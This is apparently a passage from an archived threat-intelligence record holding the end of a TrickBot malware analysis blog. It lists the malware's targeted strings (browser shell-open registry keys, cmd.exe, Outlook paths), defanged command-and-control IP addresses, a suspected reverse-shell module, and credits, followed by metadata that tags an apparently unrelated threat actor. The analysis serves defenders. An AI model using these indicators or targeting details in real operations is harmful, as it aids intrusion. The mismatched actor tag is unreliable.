|more\"\r\n\"SysListView32\"\r\n\"IE.HTTP\\\\shell\\\\open\\\\command\"\r\n\"EDGE\\\\shell\\\\open\\\\command\"\r\n\"\\\\shell\\\\open\\\\command\"\r\n\"ChromeHTML\"\r\n\"FirefoxHTML\"\r\n\"\\\\mmc.exe\"\r\n\"\\\\cmd.exe\"\r\n\"\\\\explorer.exe\"\r\n\"\\\\Microsoft Office\\\\Office16\\\\outlook.exe\"\r\nhttps://www.sneakymonkey.net/2019/05/22/trickbot-analysis/\r\nPage 18 of 20\n\n\"\\\\Microsoft Office\\\\Office15\\\\outlook.exe\"\n\"\\\\Microsoft Office\\\\Office14\\\\outlook.exe\"\n\"\\\\Microsoft Office\\\\Office12\\\\outlook.exe\"\n\"\\\\Microsoft Office\\\\Office11\\\\outlook.exe\"\nnewBCtestDll64\nOSINT reports as reverse shell. Will confirm later with network traffic/PCAP analysis.\nyesyes\u003c\ndecoded config C:\\Users*\\AppData\\Roaming\\gpuDriver\\Data\\NewBCtestDll64_configs\n162[.]209[.]124[.]166:80167[.]99[.]206[.]127:80199[.]247[.]24[.]9:80 Conclusion:\nVery quickly you can gather IOCs and some basic understanding of the malware. Obviously further analysis on\nnetwork traffic and stepping through the unpacking of the malware will result in any missed bits of information\nbut requires reverse engineer lv.2 🥇🥇\nTRICKBOT can be a real pain and while doing this research it was even in the US news - taking a school offline.\nIf you do detect a TRICKBOT infection in your environment, the likely hood is with, you have an EMOTET\nproblem too - so one to be aware of and check that out.\nTrickbot normally has its own malspam-based distribution channel, but now Trickbot attackers are also\nusing Emotet for their infections.\nhttps://unit42.paloaltonetworks.com/unit42-malware-team-malspam-pushing-emotet-trickbot/\n2019-05-16 - #Emotet still doing #Trickbot as the follow-up malware this week, it seems.\npic.twitter.com/Ozay0p1MhS\n— Brad (@malware_traffic) May 16, 2019\nWith the rate of modules being developed by TRICKBOT, understanding the impact it can have on your\nenvironment is key for defense. Hopefully this helped you understand the threat TRICKBOT imposes and has\nspurred you on to look in these various areas to proactively harden what 'TRICK' is looking for to ultimately steal.\nWith the added 'access-as-a-service' which criminal groups are providing nowdays, your TRICK infection might\nturn into something else. TBC 🙈🙈🙈\nhttps://www.sneakymonkey.net/2019/05/22/trickbot-analysis/\nPage 19 of 20\n\nConfigs/IOCs\r\nhttps://pastebin.com/wZ3R0gCa\r\nhttps://pastebin.com/ghGtMBLH\r\nFurther Analysis:\r\nNetwork lateral movement analysis (SMB/IPC/EternalBlue/Champion)\r\nCreate a script to loop through the modules, decode, complete string analysis and automatically report back\r\ndiffs.\r\nNetwork IOCs / PCAP traffic of infection - @malware_traffic does a great job of this already.\r\nLate to the game with this but this looks gold! Unpacking the main config, Open Analysis Live -\r\nhttps://www.youtube.com/watch?v=EdchPEHnohw\r\nHappy to hear any further information I've missed or is key for defenders 😎.\r\nCredits:\r\n@hasherades great Youtube content aswell as the decrypting scripts used 👏👏👏\r\nMS-ISAC TRICKBOT Primer March 2019 https://www.cisecurity.org/wp-content/uploads/2019/03/MS-ISAC-Security-Primer-Trickbot-11March2019-mtw.pdf\r\n@malware_traffic 2019-04-27 TRICKBOT SAMPLE\r\n@VK_intel for his blog - https://www.vkremez.com/2017/09/lets-learn-reversing-trickbot-banking.html\r\n@felixw3000's analysis https://www.uperesia.com/how-trickbot-tricks-its-victims\r\nSource: https://www.sneakymonkey.net/2019/05/22/trickbot-analysis/\r\nhttps://www.sneakymonkey.net/2019/05/22/trickbot-analysis/\r\nPage 20 of 20",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.sneakymonkey.net/2019/05/22/trickbot-analysis/"
	],
	"report_names": [
		"trickbot-analysis"
	],
	"threat_actors": [
		{
			"id": "5d2bd376-fcdc-4c6a-bc2c-17ebbb5b81a4",
			"created_at": "2022-10-25T16:07:23.667223Z",
			"updated_at": "2026-04-10T02:00:04.705778Z",
			"deleted_at": null,
			"main_name": "GCHQ",
			"aliases": [
				"Government Communications Headquarters",
				"Operation Socialist"
			],
			"source_name": "ETDA:GCHQ",
			"tools": [
				"Prax",
				"Regin",
				"WarriorPride"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434620,
	"ts_updated_at": 1775791418,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/6321d907e9bd2d117363b0075415a26d8f449c97.pdf",
		"text": "https://archive.orkl.eu/6321d907e9bd2d117363b0075415a26d8f449c97.txt",
		"img": "https://archive.orkl.eu/6321d907e9bd2d117363b0075415a26d8f449c97.jpg"
	}
}